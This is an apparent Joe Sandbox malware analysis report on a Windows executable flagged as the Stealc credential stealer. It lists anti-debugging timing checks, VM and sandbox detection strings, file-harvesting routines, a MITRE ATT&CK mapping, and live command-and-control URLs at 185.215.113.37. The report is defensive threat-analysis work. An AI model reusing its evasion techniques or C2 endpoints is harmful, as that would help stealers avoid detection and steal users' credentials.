                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7ED2 second address: FD7EE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD931D second address: FD9331 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jno 00007F4178B56566h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDAC4C second address: FDAC52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56403D7 second address: 5640424 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 629DC4DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, esi 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F4178B5656Ch 0x00000014 sbb si, D748h 0x00000019 jmp 00007F4178B5656Bh 0x0000001e popfd 0x0000001f mov bx, cx 0x00000022 popad 0x00000023 push eax 0x00000024 jmp 00007F4178B56575h 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640424 second address: 5640428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640428 second address: 564042E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564042E second address: 5640443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F417883CDD1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640443 second address: 5640473 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B56571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F4178B5656Eh 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ch, bl 0x00000018 mov cl, 0Fh 0x0000001a popad 0x0000001b rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D419E9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D41AAF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D3F652 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F134F9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F7CF41 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00AF38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00AF4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00AEDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00AEE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00AEED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00AF4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00AF3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00AEF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00AE16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00AEDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00AEBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE1160 GetSystemInfo,ExitProcess,0_2_00AE1160
                Source: file.exe, file.exe, 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1482335247.00000000017F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1482335247.000000000177E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1482335247.00000000017C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                Source: file.exeBinary or memory string: wqEmu.
                Source: file.exe, 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13650
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13685
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13630
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13645
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13633
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE45C0 VirtualProtect ?,00000004,00000100,000000000_2_00AE45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00AF9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF9750 mov eax, dword ptr fs:[00000030h]0_2_00AF9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00AF78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7744, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00AF9600
                Source: file.exe, file.exe, 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00AF7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00AF7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00AF7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00AF7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.ae0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1441400565.00000000054B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1482335247.000000000177E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7744, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.ae0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1441400565.00000000054B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1482335247.000000000177E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7744, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpnfile.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpt~file.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phph~file.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37file.exe, 00000000.00000002.1482335247.000000000177E000.00000004.00000020.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      		unknown
                      http://185.215.113.37/wsfile.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      		unknown
                      http://185.215.113.37afile.exe, 00000000.00000002.1482335247.000000000177E000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        185.215.113.37
                        		unknownPortugal
                        		206894WHOLESALECONNECTIONSNLtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1532902
                        Start date and time:2024-10-14 06:02:07 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 4m 3s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:6
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 18
                        • Number of non-executed functions: 90
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.9475616266951885
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'869'312 bytes
                        MD5:b77c7d40ff8020c4240697847b4f5684
                        SHA1:0a224a33c17ee87b76f1f83b76c36c5de12909e7
                        SHA256:f7b35010365b337b72e82d179783fe5165f92ffbdbf74071e44877a06c40c8a6
                        SHA512:f93792fe50d7d06a7f75873ef3384c760374e002ee9ef587d3d433b8b4533c5f51e164815d1b774b9f475e8672002b2990e8a4aa07ab0c8b92ff6a1a76f68a7c
                        SSDEEP:49152:/IrwzhhgshqvX9WxgzI6TWTdZe2uvESsJuMHkrYTMRzxR:+Qhgs0HTWTHDuIHkrYTaD
                        TLSH:4D8533FAE6127A0AE42C8473C79BC49B7D37A08A59E6F8573E0611212E538DF7523CC5
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                        File Icon

                        Icon Hash:00928e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0xaaa000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                        Entrypoint Preview

                        Instruction
                        jmp 00007F417885DCDAh
                        pcmpgtb mm3, qword ptr [eax+eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        jmp 00007F417885FCD5h
                        add byte ptr [edx+ecx], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add al, 0Ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add dword ptr [eax+00000000h], eax
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add al, 0Ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        xor byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        pop ds
                        add byte ptr [eax+000000FEh], ah
                        add byte ptr [edx], ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], cl
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add al, 0Ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        xor byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        pop ds
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], cl
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add al, 0Ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        xor byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        sub byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add dword ptr [eax+00000000h], eax
                        add byte ptr [eax], al

                        Rich Headers

                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        0x10000x25b0000x22800345b549105b494cfcd66b1e2fa307107unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
